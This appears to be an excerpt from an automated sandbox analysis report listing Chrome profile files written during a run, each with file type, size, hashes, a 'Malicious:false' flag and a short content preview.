                                                                                                                                                                                MD5:D3DE9705683F20E7A27939D19E9F84B6
                                                                                                                                                                                SHA1:43E8B5252180AF294365B3CBF9897BE629AF736D
                                                                                                                                                                                SHA-256:7F68AD6829D7138BD390A175EFCA61BA3CAEAEB7357EAA0316860550DFB2A34D
                                                                                                                                                                                SHA-512:37713634A2A1FEED2449CFDDA0DED9CC6040266F51306D5BEF1FF0E11A846EC1E7B1D1021030C9AB6A5B451BEFC8466637D2FDFE98E9FA2748EDC4483728ED7B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:18.784 1244 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2021/10/25-18:17:18.790 1244 Recovering log #3.2021/10/25-18:17:18.791 1244 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                Entropy (8bit):5.259619402993821
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaO1AVq2PWXp+N23iKKdKpIFUtnaOXuNAgZmwBaOMyAIkwOWXp+N23iKKdKa/Wd:palVva5KkmFUtna+uSg/BarTI5f5KkaQ
                                                                                                                                                                                MD5:D3DE9705683F20E7A27939D19E9F84B6
                                                                                                                                                                                SHA1:43E8B5252180AF294365B3CBF9897BE629AF736D
                                                                                                                                                                                SHA-256:7F68AD6829D7138BD390A175EFCA61BA3CAEAEB7357EAA0316860550DFB2A34D
                                                                                                                                                                                SHA-512:37713634A2A1FEED2449CFDDA0DED9CC6040266F51306D5BEF1FF0E11A846EC1E7B1D1021030C9AB6A5B451BEFC8466637D2FDFE98E9FA2748EDC4483728ED7B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:18.784 1244 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2021/10/25-18:17:18.790 1244 Recovering log #3.2021/10/25-18:17:18.791 1244 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):402
                                                                                                                                                                                Entropy (8bit):5.370421902180452
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maa7tq2PWXp+N23iKKdKks8Y5JKKhdIFUtnamhZmwBadkwOWXp+N23iKKdKks8Yx:paRva5KkkOrsFUtnaC/Bad5f5KkkOrzJ
                                                                                                                                                                                MD5:A26679649BAA191724AD26D435F5B99F
                                                                                                                                                                                SHA1:C4FC6FC0BF880E280ED5CA005ACC1C3463E1261A
                                                                                                                                                                                SHA-256:E21F78AEB0AD97FD12A99388D9D5BBEB86ABEA68A864D12D3D263F8A8ECA8672
                                                                                                                                                                                SHA-512:487D2422AFA316CBD4B1551B4F98F479CFA3119E37BE08DB33F003D1BE7E8A78A664812FE0EC465BE9F4A40238FB7077BA7998805D9ACD4E7669CE853D843F65
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:18:39.965 1720 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/MANIFEST-000001.2021/10/25-18:18:39.967 1720 Recovering log #3.2021/10/25-18:18:39.968 1720 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.oldjs (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):402
                                                                                                                                                                                Entropy (8bit):5.370421902180452
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maa7tq2PWXp+N23iKKdKks8Y5JKKhdIFUtnamhZmwBadkwOWXp+N23iKKdKks8Yx:paRva5KkkOrsFUtnaC/Bad5f5KkkOrzJ
                                                                                                                                                                                MD5:A26679649BAA191724AD26D435F5B99F
                                                                                                                                                                                SHA1:C4FC6FC0BF880E280ED5CA005ACC1C3463E1261A
                                                                                                                                                                                SHA-256:E21F78AEB0AD97FD12A99388D9D5BBEB86ABEA68A864D12D3D263F8A8ECA8672
                                                                                                                                                                                SHA-512:487D2422AFA316CBD4B1551B4F98F479CFA3119E37BE08DB33F003D1BE7E8A78A664812FE0EC465BE9F4A40238FB7077BA7998805D9ACD4E7669CE853D843F65
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:18:39.965 1720 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/MANIFEST-000001.2021/10/25-18:18:39.967 1720 Recovering log #3.2021/10/25-18:18:39.968 1720 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):131072
                                                                                                                                                                                Entropy (8bit):0.0032209707218004476
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:ImtVuXe6v+T/hgi:IiVuZ+Ngi
                                                                                                                                                                                MD5:19344495778C994B0D656F3B1914A517
                                                                                                                                                                                SHA1:AD6630E3A6B4A452AAE3AA7785B1D00BA706AC87
                                                                                                                                                                                SHA-256:DBFD5F15C0D5A37F8D9EAF522F8E260069C8A315C5C533FD514AC1798DB587DF
                                                                                                                                                                                SHA-512:D1E1E28712AB9B4979007A57AB9777595BDC44210D2A3CECD804E50B8FA265A7271C1E96D2D6AE64C93E61F2463F951114E68A28F2C4A364AA833079DCF5C199
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: VLnk.....?......(._Ikx.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                                                                                                                                                MD5:6752A1D65B201C13B62EA44016EB221F
                                                                                                                                                                                SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                                                                                                                                                SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                                                                                                                                                SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: MANIFEST-000004.
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT.. (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                                                                                                                                                MD5:6752A1D65B201C13B62EA44016EB221F
                                                                                                                                                                                SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                                                                                                                                                SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                                                                                                                                                SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: MANIFEST-000004.
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):136
                                                                                                                                                                                Entropy (8bit):4.519202906206407
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:tUKjdEjIVFwG1Zmwv2SdEyCJ1V8tSdEZCVFJ1WGv:maajIvZZmwBay2VhaZ2tv
                                                                                                                                                                                MD5:20E9F8AFD8C2ED8FD4308AB01A349469
                                                                                                                                                                                SHA1:F49EB73B68390D479914E57ADD20E093031FC395
                                                                                                                                                                                SHA-256:12E3D1F020453A6A005F8A08A6D00159ACFD8B56AFB27D53608FA30FC518BECC
                                                                                                                                                                                SHA-512:ED904D915F0F9938A0FE4EAAD424C0795A38CD06305F3B49F7535841492FF293E83DE87DF17AE72F4638BAEB59125E3E596AC25FA8CDD7E44F751710FA7E6F6D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:35.486 520 Recovering log #3.2021/10/25-18:17:35.999 520 Delete type=0 #3.2021/10/25-18:17:36.001 520 Delete type=3 #2.
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old8 (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):136
                                                                                                                                                                                Entropy (8bit):4.519202906206407
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:tUKjdEjIVFwG1Zmwv2SdEyCJ1V8tSdEZCVFJ1WGv:maajIvZZmwBay2VhaZ2tv
                                                                                                                                                                                MD5:20E9F8AFD8C2ED8FD4308AB01A349469
                                                                                                                                                                                SHA1:F49EB73B68390D479914E57ADD20E093031FC395
                                                                                                                                                                                SHA-256:12E3D1F020453A6A005F8A08A6D00159ACFD8B56AFB27D53608FA30FC518BECC
                                                                                                                                                                                SHA-512:ED904D915F0F9938A0FE4EAAD424C0795A38CD06305F3B49F7535841492FF293E83DE87DF17AE72F4638BAEB59125E3E596AC25FA8CDD7E44F751710FA7E6F6D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:35.486 520 Recovering log #3.2021/10/25-18:17:35.999 520 Delete type=0 #3.2021/10/25-18:17:36.001 520 Delete type=3 #2.
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000004
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:MPEG-4 LOAS
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):50
                                                                                                                                                                                Entropy (8bit):5.028758439731456
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Ukk/vxQRDKIVmt+8jzn:oO7t8n
                                                                                                                                                                                MD5:031D6D1E28FE41A9BDCBD8A21DA92DF1
                                                                                                                                                                                SHA1:38CEE81CB035A60A23D6E045E5D72116F2A58683
                                                                                                                                                                                SHA-256:B51BC53F3C43A5B800A723623C4E56A836367D6E2787C57D71184DF5D24151DA
                                                                                                                                                                                SHA-512:E994CD3A8EE3E3CF6304C33DF5B7D6CC8207E0C08D568925AFA9D46D42F6F1A5BDD7261F0FD1FCDF4DF1A173EF4E159EE1DE8125E54EFEE488A1220CE85AF904
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: V........leveldb.BytewiseComparator...#...........
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4219
                                                                                                                                                                                Entropy (8bit):4.871684703914691
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:YXsJjMH+5s7YMHBKsvxMHVzspxMHbsIHt/soBDysKqnsllzMHpDCLsWJMHLsNuMg:RG+ZGJG+GTTD7IGpD+G7Gp2GnG4GVhH
                                                                                                                                                                                MD5:EDC4A4E22003A711AEF67FAED28DB603
                                                                                                                                                                                SHA1:977E551B9ED5F60D018C030B0B4AA2E33B954556
                                                                                                                                                                                SHA-256:DD2C9F43F622F801FCC213CDE8E3E90EF1D0D26665AE675449A94CEC7EB1D453
                                                                                                                                                                                SHA-512:84D3930579FD73C7D86144D5CDC636436955BA79759273C740D2D72BC4847F2F7F165BBCA3EB2E4DFB01777D6A5F141623278C1BF74615C5A491092CE3FD1602
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248543677350473","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543677350474","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31344},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31656},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501454993","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501454994","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39369},"server":"https://www.googleapis.com","supports_spdy":true},
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ec88f6cb-b725-470e-8654-ef1e0102c920.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):22596
                                                                                                                                                                                Entropy (8bit):5.535885803495995
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:vgjtpLl3UXR1kXqKf/pUZNCgVLH2HfD6rUAHG+nTxwI45:CLl2R1kXqKf/pUZNCgVLH2Hf+rUEG+nu
                                                                                                                                                                                MD5:D2545EED6609D08E1A85A99D12B9AAFA
                                                                                                                                                                                SHA1:B4F36404480024CF4B23067EEF9ADB6DBA09DDF7
                                                                                                                                                                                SHA-256:8A14A08F689FBC3D57FC69CC520E8DC2A9D9831F34C1D87856959A7117289AFB
                                                                                                                                                                                SHA-512:E64E1BFBE869A9B4E6A76D533461559C86362AA8BF8F2F890F857402C63FA98D8CEE5E3AF46F208EF56BAABE5F87D707E6D3E4E6FB385C08396EADFAE50D76EB
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13279684638762118","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):338
                                                                                                                                                                                Entropy (8bit):5.263565490193448
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaiQ+q2PWXp+N23iKKdKfrzAdIFUtnahygZmwBaDlQVkwOWXp+N23iKKdKfrzId:pa+va5Kk9FUtnah3/BaC5f5Kk2J
                                                                                                                                                                                MD5:41F7B49DE0AB411DF36E63DCD99FDF2B
                                                                                                                                                                                SHA1:9534D9F1F629D887CC9C5082FA909B74848069DD
                                                                                                                                                                                SHA-256:35809DDF6814FE6D6F1E825627E8BF9F01FD8F1BFC703EBF7688BAA8CA744D70
                                                                                                                                                                                SHA-512:A5FCD8A50D177717D7CB3E90B446A138E84FFED8CD3FCC5B480CED5AA3F07A028E62ED304C6E0139892ADADD4E4143655FEA364A5615C6587DF53153A6C8C48D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:36.602 14f8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/10/25-18:17:36.604 14f8 Recovering log #3.2021/10/25-18:17:36.605 14f8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.old8 (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):338
                                                                                                                                                                                Entropy (8bit):5.263565490193448
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaiQ+q2PWXp+N23iKKdKfrzAdIFUtnahygZmwBaDlQVkwOWXp+N23iKKdKfrzId:pa+va5Kk9FUtnah3/BaC5f5Kk2J
                                                                                                                                                                                MD5:41F7B49DE0AB411DF36E63DCD99FDF2B
                                                                                                                                                                                SHA1:9534D9F1F629D887CC9C5082FA909B74848069DD
                                                                                                                                                                                SHA-256:35809DDF6814FE6D6F1E825627E8BF9F01FD8F1BFC703EBF7688BAA8CA744D70
                                                                                                                                                                                SHA-512:A5FCD8A50D177717D7CB3E90B446A138E84FFED8CD3FCC5B480CED5AA3F07A028E62ED304C6E0139892ADADD4E4143655FEA364A5615C6587DF53153A6C8C48D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:36.602 14f8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/10/25-18:17:36.604 14f8 Recovering log #3.2021/10/25-18:17:36.605 14f8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):106
                                                                                                                                                                                Entropy (8bit):3.138546519832722
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
                                                                                                                                                                                MD5:DE9EF0C5BCC012A3A1131988DEE272D8
                                                                                                                                                                                SHA1:FA9CCBDC969AC9E1474FCE773234B28D50951CD8
                                                                                                                                                                                SHA-256:3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
                                                                                                                                                                                SHA-512:CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                Entropy (8bit):2.8150724101159437
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Yx7:4
                                                                                                                                                                                MD5:C422F72BA41F662A919ED0B70E5C3289
                                                                                                                                                                                SHA1:AAD27C14B27F56B6E7C744A8EC5B1A7D767D7632
                                                                                                                                                                                SHA-256:02E71EB4C587FEB7EE00CE8600F97411C2774C2FC34CB95B92D5538E7F30DA59
                                                                                                                                                                                SHA-512:86010ED2B2EEBDCC5A8A076B37703669C294C6D1BFAAEA963E26A9C94B81B4C53EC765D9425E5B616159C43923F800A891F9B903659575DF02F8845521F8DC46
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 85.0.4183.121
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):177374
                                                                                                                                                                                Entropy (8bit):6.047568426700161
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:SYJVdrQb+8ktzqbVehdMai2IO8evnQ16rYOFcbXafIB0u1GOJmA3iuRl:3rd0hqhdMNnOvBraqfIlUOoSiuRl
                                                                                                                                                                                MD5:45734145197FE29F6445D9D41E0DC1EA
                                                                                                                                                                                SHA1:3F0E22199A377367D35CDA6A4F418607A653745F
                                                                                                                                                                                SHA-256:A196FF283DA29A2F55219E935E2D975E4795D7210D5C13F9DCF1E213F56FE65A
                                                                                                                                                                                SHA-512:B7D3F421C3478E809C81B6A44D3AC4A82F1ECBD7CB7CE3364350C4885B979F1EACC32FEC93A517546FAC4C3D75D8F92E425FD02744005857F395E609C2AB648D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635211041003527e+12,"network":1.635178642e+12,"ticks":134016694.0,"uncertainty":3778021.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799728044"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State. (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):177280
                                                                                                                                                                                Entropy (8bit):6.047297675426721
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:fYJVdrQb+8ktzqbVehdMai2IO8evnQ16rYOFcbXafIB0u1GOJmA3iuRl:Qrd0hqhdMNnOvBraqfIlUOoSiuRl
                                                                                                                                                                                MD5:80E37A304E6F0906D0027E1A50E94491
                                                                                                                                                                                SHA1:0EE44334B54A922A4A10EA94FEE85A85B572F538
                                                                                                                                                                                SHA-256:C29110020F70113EA52367EFC130A7E8ACC5EC322752748B7CDF35ACB06A9A57
                                                                                                                                                                                SHA-512:1162B8EF660BD94A18FB4651C9DF633248120499B3149C61844DBEDC35927CC1A20882ED0753DA03CFA718A05EE1D96F2DCCDF7CE70C626B7CFB7457B9D0F878
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635211041003527e+12,"network":1.635178642e+12,"ticks":134016694.0,"uncertainty":3778021.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799728044"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):95428
                                                                                                                                                                                Entropy (8bit):3.742707489473484
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:tnelNToibAz7VU6poNJrCvNX3mpniHzeGatrYLxNxm3fj+r8dms4+oHZJxmOTD53:Na2xVKboaQeLxXboH72TKVbBJN
                                                                                                                                                                                MD5:7C979B3515C33C2E3F9C398C6D58B5E4
                                                                                                                                                                                SHA1:F03929D6C61869BDE84F63AF5F955B53FF493955
                                                                                                                                                                                SHA-256:574185132EB08DF6EB2280110A4833D9185A5D7B18270F13A094C696955B9E30
                                                                                                                                                                                SHA-512:876BF4070BB4F663BD96D3F4F315C7CC774AE16F46FE7CC8A770580D9C00D0A930C1F5F27350347C486FE88A9B1B0E512EB8F5BFEF0D5C5D70DCD2CEF044EBA2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
